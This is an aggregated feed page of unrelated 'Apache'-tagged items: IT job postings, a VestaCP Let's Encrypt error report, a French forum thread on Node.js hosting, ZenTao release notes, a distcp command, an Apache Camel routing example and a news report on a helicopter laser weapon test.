  4. July 22, 2017 (2:00 p.m. to 5:00 p.m.): Albuquerque: Crowne Plaza Albuquerque, 1901 University Boulevard NE, Albuquerque, NM 87102.
The Mexican wolf recovery program is a partnership between the U.S. Fish and Wildlife Service, Arizona Game and Fish Department, White Mountain Apache Tribe, USDA Forest Service, USDA Animal and Plant Health Inspection Service – Wildlife Services, and several participating counties. The Interagency Field Team (IFT) is responsible for the day-to-day management of the Mexican wolf population and includes field personnel from several of the partner agencies.
For more information on the Mexican Wolf Reintroduction Program, visit
http://www.fws.gov/southwest/es/mexicanwolf/ or www.azgfd.gov/wolf
The U.S. Fish and Wildlife Service works with others to conserve, protect and enhance fish, wildlife, plants and their habitats for the continuing benefit of the American people. For more information, visit www.fws.gov, or connect with us through any of these social media channels: Facebook, Twitter, Flickr, YouTube, Instagram, or our Open Spaces blog.

                                                                      – FWS –
          Principal Software Engineer (Scala) - $115.00 per hour - Incendia - Boston, MA   
Software Engineer, Software Engineering, Linux, Apache, MongoDB, NoSQL, MySQL, OpenTSDB, HBase, CouchDB, Basho Riak, Accumulo/sqrrl, Cassandra, Hadoop, Hive,... $115 an hour
From Incendia Partners - Fri, 30 Jun 2017 04:04:42 GMT - View all Boston, MA jobs
          VestaCP Let's Encrypt Broken   

Hi,

I can't seem to get Vesta's built in Let's Encrypt to work on a new install I did earlier.

My server runs CentOS 7, I only installed Apache, MySQL, FTP and IPtables / Fail2Ban on the Vesta install script.

The specific error I get in the control panel when I try to deploy a certificate is

"Error: Invalid response from http://domain.com/.well-known/acme-challenge/randomtext: \"

I tried to use Vesta's CLI to add the SSL certificate and got a different error.

[root@dedi local]# v-add-letsencrypt-domain admin domain.com /usr/local/vesta/bin/v-check-letsencrypt-domain: line 100: /home/admin/web/domain.com/public_html/.well-known/acme-challenge/randomtext: No such file or directory chown: cannot access ‘/home/admin/web/domain.com/public_html/.well-known’: No such file or directory Error: Invalid response from http://domain.com/.well-known/acme-challenge/randomtexxt: \

So I tried creating the well-known folder manually (where it was trying to be found) and got this error instead.

Error: Invalid response from http://domain.com/.well-known/acme-challenge/randomtexxt: \

I'm not really sure what to try next, I didn't have this issue with my other server (although that one runs NGINX instead of Apache), since it's a fresh install I thought it would work from the get go.

Any ideas?


          US-WestCoast VPS(/Dedi) low-spec less than $10-15 quarterly/semi-annually   

I'm a C# developer that also plays Minecraft with a deaf (hard-of-hearing) brother, so my requirements aren't all that steep.. Looking for something with 1.5GB+ ram, 2.4ghz+ at least a single dedicated thread/vcore, though 2 would be nice, and any form of storage of at least 20GB+ would suffice. It'll host a 2-3 user MC server (idle more often than not) as well as apache/LAMP stack with a git-server.

West-coast is requested because I'm currently in the Philippines until moving back to California next year.. Ping times <200ms aren't achievable any further than a couple hundred miles inland.

Thanks for taking the time to post any offers you may have, and happy croning. :)

Official request details below: -

VZ Type: OpenVZ, KVM

Number of Cores: 1+ (preferably 2.4ghz+, no atoms if avoidable)
RAM: 1536 MB+
Disk Space: 20 GB+
Disk Type: Any

Bandwidth: 750GB+
Port Speed: 50mbps+

DDoS Protection: Most likely not needed but it would be a plus.

Number of IPs:A single IPv4 is sufficient.

Location: West-Coast USA (or south-west Canada)

Budget: $10-$15 quarterly / semi-annually

Billing period:
Quarterly / semi-annually

          How to Install Joomla with Apache on Debian 9 (Stretch)   

HowToForge: Joomla is one of the most popular and widely supported open source content management system (CMS) platforms in the world.


          Apache Kafka Developer   
SolutionIT, Inc. Philadelphia, PA
          Apache CXF framework web service getting-started example   

          THIS HAPPENED TOO, AND IT'S TERRIFYING!!! FOR THE FIRST TIME!!! A high-power LASER weapon FIRED from an Apache AH-64 attack helicopter!!! [VIDEO]   

THIS HAPPENED TOO, AND IT'S TERRIFYING!!! FOR THE FIRST TIME!!! A high-power LASER weapon FIRED from an Apache AH-64 attack helicopter!!! [VIDEO]

The first test by the US armed forces of a high-power laser weapon mounted on an Apache AH-64 attack helicopter was a success.

In the demonstration, held at the White Sands test range in New Mexico, the laser weapon located, targeted and hit a ground target at a distance of about 1.4 kilometres.

The weapon, developed by Raytheon, is nearly silent and its shots almost invisible, which makes it particularly hard for enemies to detect; it may be used on battlefields in the near future.

Laser systems have been used on Apache helicopters since 1984, but they were low-power and served only to guide air-to-ground missiles. According to Raytheon, this was the first time a fully integrated laser system successfully hit a static target from a helicopter, across a variety of altitudes, speeds and flight phases.

These lasers are particularly accurate because, unlike conventional shells and bullets, they fire in a straight line, and they are powerful enough to destroy targets.

The company used an electro-optical infrared sensor, a variant of the Multi-Spectral Targeting System. It says the power of the laser beam can be adapted to each material, and that it can neutralize human targets without killing them.

During the test, cruise missiles, shells and other projectiles were neutralized, the company reported, pointing out that "unlike conventional weapons, lasers don't run out of bullets".

However, they use a lot of energy and for now cannot be used in fog or smoke, or against targets with a special anti-laser coating.

The US armed forces are increasingly turning to laser technology and already use such weapons to shoot down enemy missiles and unmanned drones.

Earlier this year, US infantry units used laser weapons for the first time during exercises, shooting down 50 drones.



          Re: Why you should leave web hosting to web hosts   
Alcaline wrote:
To finish, you say

Quote:
But lol, are you doing it on purpose? Mr. Green But lol, are you doing it on purpose?
NODEJSSSSSSS xDDD


But it seems to me that NodeJS can replace PHP (given that, from what I've seen on the internet, nodejs
cannot compile PHP),

But then how come PHP can still be used? There must be a server (as xenoxis says),
Apache/Nginx on another port, that handles the PHP requests, no?

Otherwise, a host that offers to host your site without PHP immediately becomes much less interesting Okay


I built my nodejs server, and then later on I downloaded "raw" php, and when there's a .php extension, well, I do the rendering with it by passing it the file as an argument, that's it
There is no Apache/Nginx, that's it Mr. Green

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43848


          Re: Why you should leave web hosting to web hosts   
To finish, you say

Quote:
But lol, are you doing it on purpose? Mr. Green But lol, are you doing it on purpose?
NODEJSSSSSSS xDDD


But it seems to me that NodeJS can replace PHP (given that, from what I've seen on the internet, nodejs
cannot compile PHP),

But then how come PHP can still be used? There must be a server (as xenoxis says),
Apache/Nginx on another port, that handles the PHP requests, no?

Otherwise, a host that offers to host your site without PHP immediately becomes much less interesting Okay

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43847


          Re: Why you should leave web hosting to web hosts   
Xenoxis wrote:
Your site's page takes 15 years to load, and once loaded, it's ultra slow ...

But lol, are you doing it on purpose? Mr. Green


Xenoxis wrote:
Well, yes it is Rolling Eyes

Well no, precisely: on every PC and smartphone everything works, the page loads fairly fast (2-4 sec) and the page is very smooth Rolling Eyes
I don't know how many times I'm going to have to tell you: you are the ONLY one running into this problem;
instead of saying that nodejs is a big pile of crap and that I code like a big pile of crap, don't you think the problem might come from you?


Xenoxis wrote:
No need, I've already told you everything Wink

Ok Mr. Green
But show me what you see, because I don't know what is slow in the page (the scrolling, the particles, the hover on the buttons?)




Xenoxis wrote:
So then, what server does your site run on? Apache? Nginx? Or does your framework act as the server? Neutral
In any case, I don't know whether using javascript server-side is the best idea there is Rolling Eyes

But lol, are you doing it on purpose? Mr. Green But lol, are you doing it on purpose?
NODEJSSSSSSS xDDD
You're killing me here LOLLL Laughing Laughing Mr. Green Dying of laughter
If it's such a bad idea, then I wonder why it's getting more and more popular and more and more people are doing it, very strange xD
If it's just to criticize NodeJS, please open a separate topic and pour all your hate into it, thanks Okay

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43844


          Re: Why you should leave web hosting to web hosts   
Flammrock wrote:

Well, it can't come from the server, because apparently the problem occurs after the page has loaded xD


But lol, are you doing it on purpose? Mr. Green
Xenoxis wrote:
when your site takes more than 5 seconds (average of 12 s, beat that xD) to load, I tell myself there's a problem

Your site's page takes 15 years to load, and once loaded, it's ultra slow ...


Flammrock wrote:

It's true that I put in quite a few particles, but not to the point of making the page lag xDD Mr. Green

Well, yes it is Rolling Eyes

Flammrock wrote:

You'd have to show me in a video what you're seeing, so I can see what I can do, as best I can, to solve your problem Okay

No need, I've already told you everything Wink


Flammrock wrote:

The thing named "X-Express" is Express, a framework used systematically with nodejs, which optimizes and simplifies the server-side code.
And if all you found was Express, well, know that you have work ahead of you, because I use plenty of others xDDD


I didn't have to go far to find that, I just looked at the headers your http server returns, and the "Name" has the value "X-Express" Rolling Eyes
So then, what server does your site run on? Apache? Nginx? Or does your framework act as the server? Neutral
In any case, I don't know whether using javascript server-side is the best idea there is Rolling Eyes

Message: http://batch.xoo.it/t5809-Pourquoi-il-faut-laisser-l-h-bergement-web-aux-h-bergeurs.htm?p=43843


          Installation and maintenance of your SSL certificate   
Here you will find Symantec's instructions for maintaining your SSL certificate, as well as some common errors that occur on the most widely used server software platforms on the market.

If your server software is not listed below, consult the Symantec knowledge base. Alternatively, you can contact your web server vendor directly; they will certainly know more about their own software.


          ZenTao 9.3.beta Released: Framework Upgraded, Application Security Enhanced   

Hello everyone, version 9.3.beta of the ZenTao project management software has been officially released. This release mainly upgrades the framework, enhances application security, and adjusts the one-click installation packages.

Changelog

Completed requirements
2021 Change loadModel to singleton mode (see the sketch after this list)
2022 The helper::substr() method miscalculates
2024 Switch file filtering to a whitelist model
2149 Merge the recent changes into the framework.
2223 In the getCSS method, the returned data is wrong when extensionLevel equals 0. Check the getJS method as well
2232 The createLink check inside the framework is flawed.
2233 Add comments inside the framework's fetch() method, for fetch's own part.
2234 Fix the issues found in this Sobug round in the framework code
2235 Add background comments for some of the logic in the code
2281 Provide centralized parameter filtering
2299 Provide a basic file upload module, adjust the image format of the rich-text editor, and drop the previous file's extension
2315 Add a feature to view the database password
2316 Adjust the password protection control
2320 Move the password-related features into a separate menu group
2321 Chinese translations still appear in the English interface.
2322 A restart is actually not needed after setting the language.
2323 Add an option in the control panel to serve ZenTao from the root directory
2324 Add a log menu group
2325 The control panel needs to flush the privilege tables after changing the MySQL root account password
2334 The Windows one-click package can remove the PHP response-directory restriction with one click
2335 The Windows one-click package can control the apache and mysql services separately
2338 The one-click package control panel errors out when backing up ZenTao while the services are stopped
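
A note on change 2021 above: "singleton mode" means loadModel() now returns one shared instance per model rather than constructing a new object on every call. Below is a generic sketch of that caching idea in Java; ZenTao itself is PHP, and every name here is illustrative, not ZenTao's actual API:

import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

public class ModelLoader {
    // One cached instance per model name, shared by all callers.
    private static final Map<String, Object> MODELS = new ConcurrentHashMap<>();

    public static Object loadModel(String name) {
        // Instantiates the model only on the first request; later calls
        // for the same name return the cached instance.
        return MODELS.computeIfAbsent(name, ModelLoader::createModel);
    }

    private static Object createModel(String name) {
        // Stand-in for the real model construction logic.
        return new Object();
    }
}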

Downloads

1. ZenTao project management software source code

Download site 1
Download site 2

2. Integrated runtime environment downloads: do not use the packages below to upgrade; they are for new installations only
Windows one-click installation package (for 64-bit Windows)
Download site 1
Download site 2

Windows one-click installation package (for 32-bit Windows)
Download site 1
Download site 2

Linux 64-bit one-click installation package (for 64-bit Linux)
Download site 1
Download site 2

Linux 32-bit one-click installation package (for 32-bit Linux)
Download site 1
Download site 2
Note: the Linux one-click package must be extracted directly into the /opt directory.

3. DEB package download: can be installed on Ubuntu and Debian via the dpkg package manager
Download site 1
Download site 2

4. RPM package download: can be installed on CentOS via the rpm package manager
Download site 1
Download site 2

Installation and upgrade documentation

Installation guide: http://www.zentao.net/book/zentaopmshelp/40.html

Upgrade guide: http://www.zentao.net/book/zentaopmshelp/41.html

Feature screenshots

Backing up ZenTao from the one-click package control panel

Password-related features grouped into a separate menu group

Software interface screenshots

ZenTao - My Zone

ZenTao - Create a story

ZenTao - Task kanban

ZenTao - Report a bug


          MSI GE62 7RE Apache Pro Review   
This 15.6" laptop sports a GTX 1050 Ti 4GB and a Core i7-7700HQ for just over £1,000.

          Java Developer   
Mastech is a growing company dedicated to innovation and teamwork. We are currently seeking a Java Developer for our client in the IT Services domain. We value our professionals, providing comprehensive benefits, exciting challenges, and the opportunity for growth. This is a Contract position and the client is looking for someone to start immediately.

Duration: 12 Months Contract
Location: Ewing, NJ/ Zip Code: 19087
Compensation: Market Rate

Role: Java Developer

Role Description: The Java Developer would need to have at least 5+ years of experience.

Responsibilities:

- Coordinate and support software production schedules and processing.
- Work with units throughout organization to ensure smooth delivery of existing services and program modifications.
- Support the planning and training of internal clients when new applications are launched or new processes are put in place.
- Provide peer leadership and collaborate with Leads, team members and other development staff.
- Independently develops software, codes, tests and debugs.
- Recommend modification to existing processes and new procedures to solve complex problems considering the existing system limitations, operating time and desired results.
- Collaborate with team members as well as across FCEs/SBUs to identify ways to improve existing processes and technical output.
- Proactive identification of gaps (especially across areas) and escalate in a timely and appropriate manner.
- Create and update all relevant documentation and specifications for design, development, and testing.
- Escalate problems of complex technical circumstances to appropriate channels.

Required Skills:

- JPA, Hibernate, Spring Core, Spring MVC, Apache CXF, JUnit
- 7 Years of Java development experience.
- 5 Years of Strong objected oriented analysis and design.
- 2 Years of experience with build/integrations tools Ex: Maven, Ant, Hudson, Continuum, and Jenkins - Preferred.
- Development Environment, Eclipse, Tomcat, Linux.

Education: Bachelor's Degree
Experience: Minimum 5+ years
Relocation: No, this position will not cover relocation expenses
Travel: No
Local Preferred: Yes

Recruiter Name: Mrudul Godavarthi
Recruiter Phone: 412 436 0333 (Ext: 2312)

EOE
          HDFS: Cluster to cluster copy with distcp   
This is the format of the distcp command for copying from HDFS to HDFS, with the source and destination clusters on Amazon AWS:

hadoop distcp "hdfs://ec2-54-86-202-252.compute-1.amazonaws.comec2-2:9000/tmp/test.txt" "hdfs://ec2-54-86-229-249.compute-1.amazonaws.comec2-2:9000/tmp/test1.txt"

More information about distcp:
http://www.cloudera.com/content/cloudera-content/cloudera-docs/CDH4/latest/CDH4-Installation-Guide/cdh4ig_topic_7_2.html
http://hadoop.apache.org/docs/r1.2.1/distcp2.html
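
Beyond single files, distcp is more often used to mirror whole directories between clusters. A hedged sketch (the hostnames and paths below are illustrative; -update is a real distcp flag that copies only files missing or changed at the destination):

$ hadoop distcp -update \
    hdfs://source-namenode:9000/data/logs \
    hdfs://dest-namenode:9000/data/logs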
          Mobile Web User Interface Development Full time Job in Elk Grove, CA   
Modis is looking to fill a Mobile Web UI Developer full time Job with our client in Elk Grove, CA 95757. If you meet the below requirements and would like to learn more about this great opportunity please apply now for immediate consideration.

We are looking for a technical generalist familiar with an assortment of leading technologies, with a current focus on mobile app design and development. The technology environment will use tools such as TypeScript, JavaScript, Angular, Bootstrap, NodeJS, WebStorm, Chrome Debugger, and including cross-platform IDEs for mobile development such as Xamarin.

EXPERIENCE:
- Proven experience developing high-quality web (or mobile web) apps containing rich content and user interface components, using HTML5, CSS3, Javascript, and REST.
- Experience working with JavaScript libraries and frameworks for mobile web development (such as JQuery, Angular, Bootstrap), and ability to work with MV* patterns.
- Experience working with touch interfaces, mobile gesture support, flexible CSS layout, security, and tight AJAX server integration (notifications, WebSockets, JSON).
- Production release and SDLC experience for mobile apps (enterprise or Internet deployed) is preferred.

RESPONSIBILITIES:
- Responsible for implementing mobile applications
- Developing the implementation code for mobile applications
- Developing the unit testing code surrounding mobile applications
- Working with the testing team to validate the applications
- Participating in the mobile product team scrums
- Working independently with limited supervision and with other department personnel

JOB QUALIFICATION / REQUIREMENTS
- B.S. in Computer Science or combination of relevant education and experience
- 1+ years of mobile app design and development
- 2+ years of Web 2.0 client-side and server-side design and development
- Experience with: web (or mobile web) apps containing rich content and user interface components, using HTML5, CSS3, LESS, Javascript, and REST; JavaScript libraries and frameworks for mobile web development (such as JQuery, Angular, Bootstrap), and ability to work with MV* patterns; touch interfaces, mobile gesture support, flexible CSS layout, security, and tight AJAX server integration (notifications, WebSockets, JSON)
- Production release and SDLC experience for mobile apps (enterprise or Internet deployed) is preferred.

Desirable:
- Knowledge of Angular (directives, services, modules, controllers)
- Understanding of MV* patterns (not DOM manipulation, 2-way binding)
- Knowledge of CSS3, and LESS (CSS pre-processor), TypeScript (a plus)
- Web (or mobile web) development with: Angular, Bootstrap, NodeJS, REST/JSON
- Object Oriented design patterns and refactoring
- One or more of: C#, Java, C, C++, scripting languages such as: Perl, Python, Ruby
- Experience in an Agile / Scrum environment or willingness to learn
- Tools like: JIRA, Jenkins, Confluence, Apache/Tomcat a plus

This Mobile Web UI Developer full time Job in Elk Grove, CA will not be open long so apply now for immediate consideration.
          Data Scientist   
Specializes in data science, analytics and architecture. Strong experience/knowledge of framing and conducting complex analyses and experiments using large volumes of complex (not always well-structured, highly variable) data. Ability to source, scrub, and join varied data sets from public, commercial, and proprietary sources and review relevant academic and industry research to identify useful algorithms, techniques, libraries, etc. Assists in efforts to centralize data collection and develop an analytics platform that drives data science and analytics capabilities. Deep domain experience in Apache Hadoop, data analysis, machine learning and scientific programming. Understands how to integrate multiple systems and data sets. Able to link and mash up distinctive data sets to discover new insights. Responsibilities include designing and developing statistical procedures and algorithms around data sources, recommending and building models for various data studies, data discovery and predictive analytics tasks, implementing any software required for accessing and handling data appropriately, working with developers to integrate and preprocess data for inputs into models, and recommending tools and libraries for data science that are appropriate for the project.

Required Qualifications:
- 5-10 years of platform software development experience
- 3-5 years of experience with, understanding and knowledge of the Hadoop ecosystem and building analytic jobs in MapReduce, Pig, Hive, etc.
- 5 years of experience in SAS, R, Perl, Python, Java, or other languages appropriate for large scale analysis of numerical and textual data
- Experience developing static and interactive data visualizations
- Strong knowledge of technical design and architecture principles
- Creating large scale data processing systems
- Driving the design and code review process
- Ability to develop and program databases, query databases and perform statistical analysis
- Working with large scale warehouses and databases; sound knowledge of tuning and query processing
- Excellent understanding of the entire development process, including specification, documentation, quality assurance, debugging practices and source control systems
- Ability to understand business issues as they impact the software development project
- Solves complex, critical problems related to significant and unique issues
- Ability to delve into large data sets to identify useful trends in business and develop methods to leverage that knowledge
- Strong skills in predictive analytics, conceptual modeling, planning, statistics, visualization capabilities, identification of best data sources, hypothesis testing and data analysis
- Familiar with disciplines such as natural language processing (the interactions between computers and humans) and machine learning (using computers to improve as well as develop algorithms)
- Writing data extraction, transformation, munging etc. algorithms
- Developing end-to-end data flow from data consumption and organization to making it available via dashboards and/or APIs
- Bachelor's degree in software engineering, computer science, information systems or equivalent
- 5 years of related experience; 10 years of overall experience
- Ability to perform the activities, tasks and responsibilities described in the Position Description above
- Demonstrated track record of architecting and delivering solutions with enterprise customers
- Excellent people and communication skills
- Processing complex, large scale data sets used for modeling, data mining, and research
- Designing and implementing statistical data quality procedures for new data sources
- Understanding the principles of experimental testing and design, including population selection and sampling
- Performing statistical analyses in tools such as SAS, SPSS, R or Weka
- Visualizing and reporting data findings creatively to provide insights to the organization
- Agile Methodology Experience
- Masters Degree or PhD

We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Build Engineer (Systems Engineer)   
Adecco is looking for a Contract Build Engineer (Systems Engineer) for a large client located in Emeryville, CA. The position is expected to last approximately 9 months. See job description and requirements below:

Job Description

This is a junior level role w/min. 1 year experience.

The Build Engineer works closely with Development Architects/Engineers and Operations Release Engineers to Design, Develop, Implement and maintain a Continuous Integration Environment. Work with Development Teams in maintaining Debug and Release versions of the build scripts. Maintain a consistent overall build process between development and release engineers. Collaborate with Release Engineers in the building of Application Deployment Packages.
Manage the installation, implementation, and maintenance of Build and Deployment tools to achieve a Continuous Delivery pipeline. Facilitate the communication between operations, network and development users in setup and configuration.
Provide documentation and guidance in proper use of Build and Deployment Tools.
Facilitate the user documentation of tools and solution implementation tasks such as install, configure and customization.

Job Requirements

Qualifications
- A degree in computer science, engineering, mathematics, physics, or equivalent

Desirable Skills
- Knowledge of software process models (e.g. CMMI)
- Experience with software change and configuration management (e.g. Mantis, Jira, Trac, Track+ and Telelogic)
- Experience with multiplatform operating systems, software and builds (e.g. Linux to Windows, 32 bit to 64 bit, Apache, Tomcat)
- Experience with continuous integration systems (e.g. Cruise Control, Team City, Bamboo and/or Team Foundation Server)
- Experience with agile software development (e.g. SCRUM, KANBAN)
- Experience with static and dynamic code analysis (e.g. NDepend, NCover, dotCover, and FxCop)
- Experience with virtual environments and virtual machines (e.g. VMware and Hyper-V)
- Working knowledge of Application Lifecycle Management tools and applications

Essential Skills
- Software implementation (i.e. Visual C# or Visual Basic)
- Software version control (i.e. Git, CVS, Subversion, or Visual SourceSafe)
- Scripting and automation (i.e. Powershell)
- Software testing using automated test frameworks (i.e. CppUnit, JUnit, NUnit or MbUnit)
- Minimum two (2) years of professional experience in a software company in a technical capacity
- Minimum one (1) year of professional experience using Microsoft Enterprise .NET technologies or Build and Release automation
Adecco is an equal opportunity employer. The Adecco Group is a Fortune Global 500 company and the global leader in HR services. Our group connects over 700,000 associates with our business clients each day through our 6,600 offices in over 70 countries and territories around the world. We offer employment opportunities at any stage in your Professional Career.
          Mobile Developer, San Francisco, CA   
Mobile Developer

Modis is currently speaking with Mobile Developers who are interested in a 6 month contract to start in San Francisco, CA.

If this role is for you please apply directly to this posting with your current WORD version resume and contact info.

- 5-10 years experience
- Strong hands-on experience programming in Java, JEE, XML, HTML4/5, Ajax, Javascript, C# and/or other OOP languages
- Experience in mobile web applications development on Android or iPad platform
- Knowledge or experience with mobile application protocols and technologies such as LTE, GSM and CDMA wireless devices
- Strong understanding of standard software development life-cycle methodologies
- Software development ability, experience, speed, and quality
- Ability to work in an Agile development environment
- Interface with different departments within the organization regarding new deployments
- Excellent inter-personnel communication and teaming skills

- Experience in Spring MVC framework
- Experience in developing rich UI using JQuery/GWT/any UI framework
- Experience in developing template based UI
- Experience in performance tuning the web application
- Experience in development of complex multi-layer applications
- Experience in working with high-available mission critical web applications
- Experience in profiling web applications; experience in development of multi-threaded applications interfacing with other systems
- Experience in XML and XSLT transformation

- Experience with Rational IDE tools like RSA and RAD; experience in PL/SQL is a plus
- Current knowledge of and experience with application servers such as IBM Websphere and/or apache HTTP servers
- Excellent object-oriented design & programming skills, including strong working knowledge and experience in using UML and design patterns, refactoring
- Experience with AccuRev version control systems is a plus
- Expertise in architecting applications based on business requirements
- Experience in development of call center web applications is a plus

**If this role is for you please apply directly to this posting with your current Word version resume and contact info**
          Senior UI Engineer Job   
Modis is in need of a talented Sr. UI Engineer for one of its valued clients...

Senior UI Engineer Job Details

Everyone tries to live a healthier lifestyle around this time of year as New Year's resolutions and gym memberships flood everyone's minds. Tough to stick it out the whole way, isn't it? Luckily companies like my client are hard at work promoting healthy living and lifestyle-altering programs that can truly make the difference in 2015 and beyond.

This company allows self-insured clients to save millions by providing innovative and consistent healthcare software support, through physical call center operations and creative software solutions. They have four development teams that they are growing over the next few months, each pairing senior Java engineers with a UI developer. This will allow the technology group as a whole to work together more effectively and efficiently. Plus, we all know you can't have enough sharp minds when you're supporting clientele with employee numbers hitting the tens of thousands.

My client has built a culture; this culture is one that is fast paced, innovative, and emphasizes creativity. If you are looking for something that is going to push you mentally, technically, and personally, this is the place you need to be.

Required Skills
- Experience in engineering esthetically pleasing yet functional sites using OO JavaScript
- Angular.js, backbone.js, node.js, ember.js, coffeescript
- LESS/SASS experience preferred
- Experience with Sencha, Jasmine, Chai, Mocha, Sinon a plus
- Exposure to JSON, AJAX, & XML

Benefits

Full health, dental, vision insurance options. Competitive stock and performance bonuses, work from home on Fridays, flex hours to alleviate the morning commute, 4 weeks PTO, high pace and high energy environment. Private office building that includes gym, cafeteria, and relaxation area.

Keyword Tags

HTML, CSS, JavaScript, LESS, SASS, Grunt.js, angular.js, node.js, ember.js, batman.js, knockout.js, backbone.js, JavaScript MVC, Client-side JavaScript, Server-Side JavaScript, OOP, OO, Software Engineer, Senior Engineer, Senior Software Engineer, PHP, MySQL, LAMP, Linux, Apache, Zend, Symfony, cakePHP, Laravel, Yii, Phalcon, MySQL, QA, Automation, Automated Unit Testing, TDD, Git, SVN, Subversion, GitHub, Version Control, Stash, Beanstalk, Cucumber, Haml, Memcached, Object oriented Design, HTTP, Node, Play, Akka, Scala, UI, UX, AWS, Azure, Google, Google Analytics, NoSQL, DynamoDB, MongoDB, Couchbase, Elasticsearch, Redis, Riak, Star Schema Design, OLAP, ETL, BI technologies, Shell Scripting, Network protocols, RESTFUL web services, Java, SOAP, Websphere, Weblogic, Maven, SpringMVC, Spring, Hibernate, Java Beans, Java IDE, NetBeans, J2EE, Automation, Puppet, Ruby on Rails, Chef, Saltstack, GOF, Scrum, Agile, Python, Django, Engineer
          Sr Apps Developer   
Our Financial client located in the heart of Orange County is now seeking (2) Sr Apps Developers on an urgent basis.

Looking for an experienced .NET Developer who also has some familiarity with Java.

Requirements:

C#, ASP.NET, MVC
WCF Web Services, TFS, SQL Server
Apache MQ, JSON, Mulesoft ESB

Looking to interview and on-board immediately! We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Java Developer - Career Opportunity   
Well known Fortune 500 Conglomerate seeks Top Notch Java Developers.

Key Responsibilities:
Seeking Enterprise Technical Consultants with advanced skills in Java/J2EE.
Experience building software on Java / J2EE platform.
Object Oriented Programming experience in Java / J2EE.
Knowledge of MVC architecture patterns (MVVM knowledge is bonus).
Experience with Jenkins, Maven, Ant, Spring and Other Java Frameworks.
Experience with RESTful web-services, XML/JSON API - expanding our API offering by designing and developing new APIs.
Experience with Server-side Programming-Servlet, JSP.

Excellent Career Opportunity!
Excellent Location
Great Benefits!
Great Team Players!
Room for Advancement!
Immediate Hire!
Servlet containers like Apache Tomcat
Application Server: Websphere Application Server
Data layer: JDBC, Hibernate, MyBatis, JPA (Java Persistence API)
Experience developing in Eclipse IDE; Source Control: SVN

At least 6 years of Java/J2EE development experience. Awareness of Agile methodology

We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Apache Flex 4.9.0 Released!   
The Apache Flex project has announced the release of Apache Flex 4.9.0.  See their blog post https://blogs.apache.org/flex/entry/apache_flex_4_9_0 As you can see, Apache is continuing to improve the Flex SDK.  
          Flash Builder 4.7 now shipping   
If you didn’t already catch the announcement as part of the Adobe Gaming Sneak Peek or the Game Developer Tools launch, Adobe Flash Builder 4.7 is now available.  With the 4.7 release, Flash Builder adds support for Apache Flex 4.8, … Continue reading
          Apache Flex now an official Apache project!   
As you may recall, Flex was donated to the Apache Software Foundation at the end of 2011.  According to Apache rules, we had to spend some time in “incubation” to ensure that an active community could carry Flex forward independent … Continue reading
          Flash Builder 4.7 Beta is Here!   
  We are excited to announce the availability of Flash Builder 4.7 beta. Flash Builder 4.7 adds support for Flash Player 11.4 and AIR 3.4, as well as support for the new Apache Flex 4.8 SDK. With full support to … Continue reading
          Flex trademark assigned to Apache Software Foundation   
Hi Everyone, In case you were wondering, the Flex trademark has been assigned to Apache as mentioned here: http://markmail.org/message/vkwfmjkdjzpxrkke.  As the email mentions, this is another step on the road to transitioning Flex to Apache as promised here http://www.adobe.com/devnet/flex/whitepapers/roadmap.html
          Apache Flex 4.8.0-incubating Released!   
Hey Everyone! The Apache Flex Podling (http://incubator.apache.org/flex) has announced that Apache Flex 4.8.0 has been released. This is a major milestone in the transition of Flex from Adobe to Apache. It represents pretty much the same code that was in … Continue reading
          Implementing Content Based Routing With Apache Camel   

1.0 Overview

Content Based Routing (CBR) is one of the Enterprise Integration Patterns; it allows you to route a message to the correct destination depending on the message or its content. It is one of the most important and most widely used integration patterns. For example, when a new purchase order is received, it needs to be routed to the Widget or the Gadget inventory depending on the message content.

2.0 Camel DSL for Content Based Routing

Camel DSL typically looks as shown below:
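
A minimal sketch of such a route in Camel's Java DSL (the endpoint URIs and the XPath predicate below are illustrative assumptions, not taken from the original post):

import org.apache.camel.builder.RouteBuilder;

public class PurchaseOrderRouter extends RouteBuilder {
    @Override
    public void configure() {
        // Content Based Router: inspect each purchase order and send it
        // to the matching inventory queue.
        from("activemq:queue:NewOrders")
            .choice()
                .when(xpath("/order/product = 'widget'"))
                    .to("activemq:queue:Inventory.Widgets")
                .when(xpath("/order/product = 'gadget'"))
                    .to("activemq:queue:Inventory.Gadgets")
                .otherwise()
                    .to("activemq:queue:Inventory.Unknown");
    }
}

The choice()/when()/otherwise() chain is Camel's rendering of the CBR pattern; swapping the predicate (XPath, header(), simple(), etc.) changes the routing criterion without touching the endpoints.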


          Sr. Web Developer   
Sr. Web Developer job available in Oak Creek, WI

A nationally recognized and highly respected client of ours is seeking a Sr. Web Developer for direct hire/permanent placement. As a Sr. Web Developer, the position involves working in the UI, core app, and database areas. The project will be developing the application via web, with future plans that it will be automated, eventually making it to mobile in the next phase. At this time our client is seeking W2 candidates and is not seeking candidates requiring sponsorship or working corp-to-corp.

POSITION SUMMARY
Designs and develops web applications and associated web services in support of our client's Remote Electronic Access Control solutions. The position involves working in the UI, core app, and database areas.

ESSENTIAL DUTIES AND RESPONSIBILITIES include (but are not limited to) the following:
- Analyzes software requirements to determine feasibility of design within time and cost constraints
- Designs formal software requirements from customer/market level requirements
- Consults with hardware engineers and other engineering staff to evaluate/develop interfaces between hardware and software
- Designs software within operational and performance requirements of the overall system
- Responsible for reviews of all software project phases (development requirements, test requirements, code)
- Understands how to insert new code into the software build and follows proper procedures
- Works with Software Testing to resolve issues to ensure testing can continue

PREFERRED QUALIFICATIONS
- A solid understanding of networking/distributed computing environment concepts
- Experience in web design, API and web services development
- Solid understanding of the principles of routing, client/server programming
- As new technologies emerge and impact our systems, expected to learn new technologies and resolve any problems involved in integrating new technologies with our systems
- Expert knowledge of software engineering design methods and techniques, specifically Agile development methodology
- Experience and knowledge with .NET Framework and Visual Studio
- Experience and knowledge of maintaining and debugging live software systems
- Ability to determine whether a particular problem is caused by hardware, operating systems software, application programs, or network failures
- Able to look at a problem and develop multiple solution approaches
- Possess excellent written and verbal communication skills
- Working knowledge of security and encryption (preferable but not mandatory)

EDUCATION
